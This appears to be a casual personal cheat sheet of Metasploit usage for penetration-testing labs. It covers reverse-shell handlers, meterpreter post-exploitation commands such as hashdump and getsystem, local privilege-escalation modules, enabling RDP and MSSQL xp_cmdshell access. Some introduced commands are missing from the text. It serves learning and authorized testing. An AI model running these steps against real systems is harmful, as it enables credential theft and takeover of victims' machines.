This page is just basic stuff I forget all the time. There are other Metasploit tips in sections where it's relevant.
Metasploit is so derp-easy that you can often exploit a machine by setting the remote IP in
RHOST and hitting the pew-pew button.
But sometimes that doesn't work and you cry because you know you're just a lame script kiddie pretending to be a hacker. However, you can aspire to be a decent script kiddie by knowing how to use more advanced options in Metasploit.
Exploits might not work because of an unusual configuration or path issue, which you can set with either
show options or
show advanced. The
advanced section may let you set
verbose = true to provide more information about why an exploit isn't working.
You might also need to set the correct target:
show targetsset target [target number]
MSO8-067 sometimes needs this because the module can't always identify the exact operating system version and language pack.
It's also important to pay attention to the default payload. Occasionally, you'll run into something weird like an Apache web server running on Windows, so the default Unix payload won't work.
Check and modify the payload:
show payloadsset payload [whatever]
To catch shells using meterpreter:
use exploit/multi/handlerset LHOST [attack machine]set LPORT 443run
If you're VPNed into a lab, pay attention to the IP address. I've noticed that the first time this module runs, it defaults to
eth0 and you have to restart it to use something like
Frequently used commands, mostly to enumerate a victim machine:
getuid # get current usersysinfo # gets OS and hostnameexecute # execute a commandcd # change directorypwd # print working directoryls # list files in current directorymkdir # make a directorydel # delete a filecat # read the contents of a filedownload # download a file to your machinehashdump # get contents of password fileedit # edit a file with vimrm # delete a filermdir # remove directoryupload # upload a file to the victimps # list running processesmigrate # move the active process to a designated PIDgetpid # get the current process ID (PID)kill # terminate a process by PIDipconfig # display network interfacesportfwd # forward a port on the victim to a remote serviceroute # view or modify routing tablegetprivs # get as many privileges as possiblegetsystem # get Administratorreboot # reboot the victimshutdown # shut down the victimreg # interact with the victim's registry
Meterpreter is nice because it lets you maintain multiple shell sessions and use local exploits against them. For example, the Rejetto exploit always seems to fire a few times and with meterpreter, you can catch every shell session with a single listener.
To list active sessions:
To enter a session:
sessions -i [session number]
To enter a shell from a session (not use meterpreter commands):
To exit the shell and return to meterpreter, type
I mostly use Metasploit on Windows machines because they still feel tricky to me. Below is a list of useful exploits for enumerating and running complex commands.
Once you have a meterpreter shell, you can scan for local exploits and run them. Unlike remote exploits which target using IP addresses, local exploits run against a chosen shell session.
To access local exploits, you'll need to jump out of meterpreter using
background and select one with the
meterpreter > backgrounduse /exploit/windows/whatevershow options[edit options as needed]set SESSION [session number]run
Check for exploits:
meterpreter > run post/multi/recon/local_exploit_suggester
Get a remote desktop:
meterpreter > run post/windows/manage/enable_rdp
Run a command as a different user:
backgrounduse post/windows/manage/run_as[set username and password]set CMDOUT true # output results of commandset CMD "type C:\Users\Administrator\Desktop\root.txt"run
There are manual ways to run commands as different user but I haven't tried them because I'm lazy.
If you have credentials, you can use this module to get a shell:
exploit/windows/mssql/mssql_payload[set username and password]run
It uses the
xp_cmdshell stored procedure, which isn't always enabled but can be. You could probably do the same exploit manually using a tool like dbeaver, but I haven't managed it yet. If you're attacking a very old version of MSSQL (e.g. 2000), you can connnect to it using sqsh:
sqsh -S [remote host]:[port] -U [username] -P [password]
You can then attempt to launch
xp_cmdshell with the following syntax: